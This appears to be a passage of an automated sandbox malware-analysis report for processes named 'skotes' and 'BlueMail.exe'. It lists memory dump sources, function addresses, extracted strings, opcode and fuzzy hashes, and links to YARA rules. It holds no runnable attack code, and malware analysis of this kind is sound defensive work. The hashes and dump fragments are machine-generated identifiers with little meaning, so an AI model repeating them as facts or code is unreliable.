Memory Dump Source

Source File: 00000007.00000002.1349075912.0000000000361000.00000040.00000001.01000000.00000008.sdmp, Offset: 00360000, based on PE: true

Associated: 00000007.00000002.1348944484.0000000000360000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349075912.00000000003C2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349341043.00000000003C9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349392384.00000000003CB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349432597.00000000003D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349590933.0000000000538000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349634365.000000000053A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000054F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000055D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349723424.0000000000563000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349773896.0000000000567000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349802663.0000000000570000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349830103.0000000000577000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349910260.000000000058F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349933176.0000000000591000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349956414.0000000000598000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349995691.00000000005A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350026946.00000000005BC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350057599.00000000005BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350080534.00000000005C6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350121843.00000000005CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350160524.00000000005D0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350184629.00000000005D3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350208328.00000000005DB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350229729.00000000005DD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350247962.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350270708.00000000005E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350292941.00000000005EA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350317217.00000000005F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350339485.00000000005F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350368967.00000000005FB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350407915.000000000061C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000061D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000063C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350495838.0000000000653000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350521029.0000000000654000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350541432.000000000066D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350558762.000000000066E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350576645.0000000000672000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350595688.0000000000674000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350614602.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350638385.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_360000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 680f5e044e5561cdda4b0b756d232f5a169e95095524091f9b731a67727ebdd0
Instruction ID: 7fcb150a71aedd96352b29f06246f109a51ae083a91ebf759b64518a4e4b1e17
Opcode Fuzzy Hash: 680f5e044e5561cdda4b0b756d232f5a169e95095524091f9b731a67727ebdd0
Instruction Fuzzy Hash: 91216571900119AFDF12EFA4DC819BEB7B9EF08710F108019F905BB261DB349D019B90

Function 0039F35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0039F3A3

Strings

`'<, xrefs: 0039F375
8"<, xrefs: 0039F44B

Memory Dump Source

Source File: 00000007.00000002.1349075912.0000000000361000.00000040.00000001.01000000.00000008.sdmp, Offset: 00360000, based on PE: true

Associated: 00000007.00000002.1348944484.0000000000360000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349075912.00000000003C2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349341043.00000000003C9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349392384.00000000003CB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349432597.00000000003D7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349590933.0000000000538000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349634365.000000000053A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000054F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349672555.000000000055D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349723424.0000000000563000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349773896.0000000000567000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349802663.0000000000570000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349830103.0000000000577000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349910260.000000000058F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349933176.0000000000591000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349956414.0000000000598000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1349995691.00000000005A3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350026946.00000000005BC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350057599.00000000005BF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350080534.00000000005C6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350121843.00000000005CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350160524.00000000005D0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350184629.00000000005D3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350208328.00000000005DB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350229729.00000000005DD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350247962.00000000005DE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350270708.00000000005E1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350292941.00000000005EA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350317217.00000000005F2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350339485.00000000005F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350368967.00000000005FB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350407915.000000000061C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000061D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350436317.000000000063C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350495838.0000000000653000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350521029.0000000000654000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350541432.000000000066D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350558762.000000000066E000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350576645.0000000000672000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350595688.0000000000674000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350614602.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.1350638385.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_360000_skotes.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"<$`'<
API String ID: 3903695350-3128490074
Opcode ID: cde7a5507c50b4358c20b7fd4e7d5f7e2fd01ac424ed8952495567b478a79701
Instruction ID: e70c22b7834680cf4c0fb873ee727ec65c970340cb414c5390af9a1c381e0aec
Opcode Fuzzy Hash: cde7a5507c50b4358c20b7fd4e7d5f7e2fd01ac424ed8952495567b478a79701
Instruction Fuzzy Hash: 6C316A32600A01EFEF23AA3AD895B5B73E8EF00356F11452AE449DB595DF75EC80CB61

Analysis Process: BlueMail.exePID: 5640, Parent PID: 8028COMMON

Execution Graph

Execution Coverage:	11.9%
Dynamic/Decrypted Code Coverage:	95.2%
Signature Coverage:	0%
Total number of Nodes:	63
Total number of Limit Nodes:	3

Executed Functions

Function 06042CB0 Relevance: 16.1, Strings: 12, Instructions: 1100COMMON

Download Yara Rule

Strings

$q, xrefs: 06042F33
$q, xrefs: 06043591
$q, xrefs: 06043581
$q, xrefs: 060430F7
,q, xrefs: 0604376A
$q, xrefs: 060435EA
$q, xrefs: 06042F43
$q, xrefs: 06043107
$q, xrefs: 060435DA
$q, xrefs: 060431B7
$q, xrefs: 060431A7
4, xrefs: 06043685

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: ,q$4$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q
API String ID: 0-2072453518
Opcode ID: 85787b1ce7563e9e22b8f999551445f1b5e1517004d3dc4f7da8c335a53152fc
Instruction ID: e9616810f90c33e1be2df84db3d932e9f696560c9c7948b8e0f432c88c69316d
Opcode Fuzzy Hash: 85787b1ce7563e9e22b8f999551445f1b5e1517004d3dc4f7da8c335a53152fc
Instruction Fuzzy Hash: 7EB2F874A402188FDB68DFA5C995BADBBF2FF48300F1581A9E505AB3A5CB709D81CF50

Function 06042FD7 Relevance: 8.0, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

$q, xrefs: 06043581
$q, xrefs: 060430F7
,q, xrefs: 0604376A
$q, xrefs: 060435DA
$q, xrefs: 060431A7
4, xrefs: 06043685

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: ,q$4$$q$$q$$q$$q
API String ID: 0-3956183810
Opcode ID: 0a67a0ae4d78a8b41e50f87f18d745e537b38060c53311ba87012c33bbcb64b8
Instruction ID: 642e903ee52badf8c329649f29508cf247bd27b34d98fa769908650dace659a2
Opcode Fuzzy Hash: 0a67a0ae4d78a8b41e50f87f18d745e537b38060c53311ba87012c33bbcb64b8
Instruction Fuzzy Hash: CF22FA74A40214CFDBA8DF65C985BADBBF2FF48300F1491A9E509AB2A5DB709D81CF50

Function 05A637E0 Relevance: 6.0, Strings: 4, Instructions: 983
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pq, xrefs: 05A6439A
TJq, xrefs: 05A63982
xbq, xrefs: 05A6390D
Teq, xrefs: 05A63F03

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID: TJq$Teq$pq$xbq
API String ID: 0-2466396065
Opcode ID: 09316a6192c338353896abf4b5670a88b4016a2393886b27b5a63a6a94ee1f83
Instruction ID: 69df8930dd4b8693d71f95d005c6f5fd151a150687fb0595aa0d59463c306c3a
Opcode Fuzzy Hash: 09316a6192c338353896abf4b5670a88b4016a2393886b27b5a63a6a94ee1f83
Instruction Fuzzy Hash: 94A2A475A00228CFDB65CF69C984A99BBB2FF89304F1581E9D509AB361DB319E81CF50

Function 06046628 Relevance: 4.4, Strings: 3, Instructions: 688COMMON

Download Yara Rule

Strings

(_q, xrefs: 06046DE3
Plq, xrefs: 06046810
$q, xrefs: 060468F6

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: (_q$Plq$$q
API String ID: 0-1845103021
Opcode ID: ad60fef7b0291f22ebfeda207ffb6391ecc082e932fb115f22554c5f7e12524e
Instruction ID: 4870bf9895d1fdf65c09be824ff043f2ad960d75a13c7c66dbcdb4fe0152fd52
Opcode Fuzzy Hash: ad60fef7b0291f22ebfeda207ffb6391ecc082e932fb115f22554c5f7e12524e
Instruction Fuzzy Hash: 0C4230B4B502148FDBA4EF69C594A6D7BE2FF8A700B258479E406CB361EB32DC41CB51

Function 05A65D68 Relevance: 3.9, Strings: 2, Instructions: 1351
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2, xrefs: 05A66D76
$q, xrefs: 05A663FA

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID: 2$$q
API String ID: 0-2017333547
Opcode ID: 65a6b26e1a9e8f334e4b8c1b50c224c4c62c6945f1ffc686ea802a87bd07d4a4
Instruction ID: 46ea6b7e105bdc8b0ab727d31b79557a39d70ce196f7ffa21e20576abedae4de
Opcode Fuzzy Hash: 65a6b26e1a9e8f334e4b8c1b50c224c4c62c6945f1ffc686ea802a87bd07d4a4
Instruction Fuzzy Hash: 83E2C474E04228CFDB65DF69D994B9ABBB6FB88301F1081E9D819A7344DB309E91CF50

Function 05A6E5A0 Relevance: 1.7, Strings: 1, Instructions: 424COMMON

Download Yara Rule

Strings

Teq, xrefs: 05A6E8EB

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: a021676b19c19bf77908d4eb068f0e9113ebee698e1a56983ea524533ad4c530
Instruction ID: f770edd6d3b9e4c504678143218f9bdb1170122de28fe17b1d9f3b8ece95e1cd
Opcode Fuzzy Hash: a021676b19c19bf77908d4eb068f0e9113ebee698e1a56983ea524533ad4c530
Instruction Fuzzy Hash: 1812F478A04218CFEB64CF69D954BAEBBF6FF89300F1080A9D819A7254DB345D86CF51

Function 06142C80 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 06142D0E

Memory Dump Source

Source File: 0000000E.00000002.2329956122.0000000006140000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: true

Associated: 0000000E.00000002.2329718072.00000000060F0000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60f0000_BlueMail.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b9bf9afd6fad69b0c8cdd283856e0cd30b352cc1c6d07c5fa7d7e66e21054748
Instruction ID: 194d41274a05a0069e145d0754f94f00088833d5b46a51291747dae68dcaca89
Opcode Fuzzy Hash: b9bf9afd6fad69b0c8cdd283856e0cd30b352cc1c6d07c5fa7d7e66e21054748
Instruction Fuzzy Hash: 853199B5D012589FDB14DFAAD984A9EFBF1FF49310F20942AE814B7200C775A945CF94

Function 05E87DD8 Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

Teq, xrefs: 05E87FC5

Memory Dump Source

Source File: 0000000E.00000002.2328710655.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5e80000_BlueMail.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: 4158e99730115ce53343c76af6eebfce563cf42fb1199b1ee0fb0426d7b8e37d
Instruction ID: b27750e3cd49b124f572fb2f946cdbc87a7f94536068e22e19fe36f4bb20c422
Opcode Fuzzy Hash: 4158e99730115ce53343c76af6eebfce563cf42fb1199b1ee0fb0426d7b8e37d
Instruction Fuzzy Hash: 54B1F570D05618CFEB24DFA9D984BADBBF2FB49304F60A0A9D84DA7251DB345981CF00

Function 05E87DC8 Relevance: 1.5, Strings: 1, Instructions: 250COMMON

Download Yara Rule

Strings

Teq, xrefs: 05E87FC5

Memory Dump Source

Source File: 0000000E.00000002.2328710655.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5e80000_BlueMail.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: de5cd0965fbc97efa47dc198419b33b549d7704decdcb0d0c45309be6e5d3be3
Instruction ID: c208bf2b88dcdfff06faed79410e1221bf002115b81af8381eb8f2608c2ecd84
Opcode Fuzzy Hash: de5cd0965fbc97efa47dc198419b33b549d7704decdcb0d0c45309be6e5d3be3
Instruction Fuzzy Hash: 59B1F170E05618CFEB24DFAAD984BADBBF2FB49304F6090A9D84DA7251DB345985CF00

Function 05A676FB Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa218bf63b229a80d69eeda82a02e17d390f6820d244b456818e119511188d6d
Instruction ID: fb352937d578ecd4e9be4742edad44a5989863f34ed92cebb670164900e6244f
Opcode Fuzzy Hash: aa218bf63b229a80d69eeda82a02e17d390f6820d244b456818e119511188d6d
Instruction Fuzzy Hash: 4052C578A04628CFDB64DF68C994B9ABBB6FB48301F1085D9D90DA7355DB30AE81CF50

Function 0604A090 Relevance: 7.9, Strings: 6, Instructions: 405
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'q, xrefs: 0604A114
pq, xrefs: 0604A1E7
4'q, xrefs: 0604A144
4'q, xrefs: 0604A1DA
4'q, xrefs: 0604A162
(q, xrefs: 0604A25A

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: (q$4'q$4'q$4'q$4'q$pq
API String ID: 0-2944075406
Opcode ID: 92c1082c679653f759ce18a2f2b82692109ebeb9d2e1f1a47248bb6f14bb6c7e
Instruction ID: 2a69e4c2010438956cbde71d16be8a82d4324ca09c79f790795012acc50a7028
Opcode Fuzzy Hash: 92c1082c679653f759ce18a2f2b82692109ebeb9d2e1f1a47248bb6f14bb6c7e
Instruction Fuzzy Hash: 1CD16E36A00214DFDB55DFA4C944E9ABBB2FF88310F0544A8E509AB272DB32ED55DB90

Function 06046EB8 Relevance: 6.6, Strings: 5, Instructions: 344
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(q, xrefs: 06047106
(q, xrefs: 06047201
(q, xrefs: 06047023
(q, xrefs: 06046FCC
(q, xrefs: 060470DA

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: (q$(q$(q$(q$(q
API String ID: 0-3203009404
Opcode ID: ab0d082c631741d356480c131bfe4e3732f223b69607ca6831a4072bd279218d
Instruction ID: e46af706a2d6b4c2831a505047d9f1926e9838b771c0d37bad6be898c8823ecc
Opcode Fuzzy Hash: ab0d082c631741d356480c131bfe4e3732f223b69607ca6831a4072bd279218d
Instruction Fuzzy Hash: 86B1E1367443148FEB65DF68E854BAE7BE2EF89210B18847AE805CB391DB35DC06C791

Function 06048DC8 Relevance: 4.2, Strings: 3, Instructions: 481
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 060492CC
Hq, xrefs: 0604929D
Hq, xrefs: 0604931C

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: Hq$Hq$Hq
API String ID: 0-2505839570
Opcode ID: 4bcda4f059428a893b4f634f1fd972cabf4e4ebe95a9af2e47a72516749cb601
Instruction ID: fa96f625d16330320760329993fbb74a0b86376d2dc45ec78b060c545c394f02
Opcode Fuzzy Hash: 4bcda4f059428a893b4f634f1fd972cabf4e4ebe95a9af2e47a72516749cb601
Instruction Fuzzy Hash: C3125C75A00314DFDB65EFA5D894A6EBBF2EF88300F148939E4169B250DB31EC46CB90

Function 0604AA88 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'q, xrefs: 0604AD81
4'q, xrefs: 0604AE01
4'q, xrefs: 0604ACA2

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q
API String ID: 0-3126650252
Opcode ID: 2803dc57ac173f704eeaae34e65bea62826db6f7e86a4d0ea14cb8f76fba24de
Instruction ID: a2faeb0986b158963929bc266fe45706b82160774f58822a91626644273ee477
Opcode Fuzzy Hash: 2803dc57ac173f704eeaae34e65bea62826db6f7e86a4d0ea14cb8f76fba24de
Instruction Fuzzy Hash: B3F1EA74B50218CFDB58EBA4D994A9DBBB2FF88300F158568E405AB3A5DF71EC42CB50

Function 0604F050 Relevance: 4.1, Strings: 3, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hq, xrefs: 0604F1E1
(q, xrefs: 0604F1B5
(q, xrefs: 0604F189

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: (q$(q$Hq
API String ID: 0-2914423630
Opcode ID: 7c139932907afa259a13a9bbecd5cda44a176b4f46c8d34a7e026f4fa2f0988a
Instruction ID: deda0684181df78b0cdd14c3a42e42ece3d2c88bdb625133abee3d337bfa4176
Opcode Fuzzy Hash: 7c139932907afa259a13a9bbecd5cda44a176b4f46c8d34a7e026f4fa2f0988a
Instruction Fuzzy Hash: F2E16E74B40209DFDB54EFA4D5949AEBBB2EF89300F148569E811AB364DF30EC42CB91

Function 05E81CE5 Relevance: 3.8, Strings: 3, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3, xrefs: 05E81D1E
", xrefs: 05E82414
F, xrefs: 05E815BC

Memory Dump Source

Source File: 0000000E.00000002.2328710655.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5e80000_BlueMail.jbxd

Similarity

API ID:
String ID: "$3$F
API String ID: 0-436858330
Opcode ID: ec84f882360ff2aab01381c791565326b76cc3d0435f87f6cfbd8d69ff9ca83f
Instruction ID: fb82576b1ce81f13ef971156b0f14c092548506614425b1bc4c4a44634412cc6
Opcode Fuzzy Hash: ec84f882360ff2aab01381c791565326b76cc3d0435f87f6cfbd8d69ff9ca83f
Instruction Fuzzy Hash: 4521027491122DDFEB65EF64D988BEDB7B5BB08304F0061A8954EA3280CB741EC8CF81

Function 05A71EA8 Relevance: 3.1, Strings: 2, Instructions: 577COMMON

Download Yara Rule

Strings

4'q, xrefs: 05A72669
4'q, xrefs: 05A72659

Memory Dump Source

Source File: 0000000E.00000002.2325993005.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a70000_BlueMail.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 34396c7d9fb9cd6a16fe9ff499066de7542b29b6598f332de2f42d293cd91e02
Instruction ID: 788c8aedfb5001c032fabdc20833144e9c1d0c9876d7a760543f6a0416f7c041
Opcode Fuzzy Hash: 34396c7d9fb9cd6a16fe9ff499066de7542b29b6598f332de2f42d293cd91e02
Instruction Fuzzy Hash: 75429278E0421DDFDF18DB99D894AAEBBB2FF89311F508019E5226B250CB345D82CF91

Function 05A729D0 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'q, xrefs: 05A72E76
4'q, xrefs: 05A72E66

Memory Dump Source

Source File: 0000000E.00000002.2325993005.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a70000_BlueMail.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 291bf05e126ec3fadb41d090ae5dc8f1d833bbb55a95b6a1789e2f2d7943a061
Instruction ID: 8b4b4fc1e9f9f89ce774a010d7f37af6577526b8a9a5f180eb5162763804a1e8
Opcode Fuzzy Hash: 291bf05e126ec3fadb41d090ae5dc8f1d833bbb55a95b6a1789e2f2d7943a061
Instruction Fuzzy Hash: 41F1B378D0521CDFCF28DFA5E994AADBBB2FF89311F204129E426A7250DB345982CF51

Function 06048478 Relevance: 2.8, Strings: 2, Instructions: 344
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(q, xrefs: 0604848C
d, xrefs: 060486D9

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: (q$d
API String ID: 0-1617062230
Opcode ID: 63c51201441a4f2d4c670b70e02e100002ee142e1053a6f61c0cfd5c1d09ea74
Instruction ID: b4e5d562a1f1b474f339ffb27a9aaeb31392f29775d27bd4d490a44ad76a5046
Opcode Fuzzy Hash: 63c51201441a4f2d4c670b70e02e100002ee142e1053a6f61c0cfd5c1d09ea74
Instruction Fuzzy Hash: 71D16B75B00605CFCB64DF28C484A6ABBF2FF89310B16C969D45A9B755DB34F842CB90

Function 060448F0 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(q, xrefs: 06044A06
Hq, xrefs: 06044A95

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID: (q$Hq
API String ID: 0-1154169777
Opcode ID: 6908d3c66087c88acdfc8975dbea742cccf42efcc42c0cffde6428d5585bbe63
Instruction ID: a4688524cbdc3926633d96958dea9d79eb09b98cf0ae757b2a700e523ef0c214
Opcode Fuzzy Hash: 6908d3c66087c88acdfc8975dbea742cccf42efcc42c0cffde6428d5585bbe63
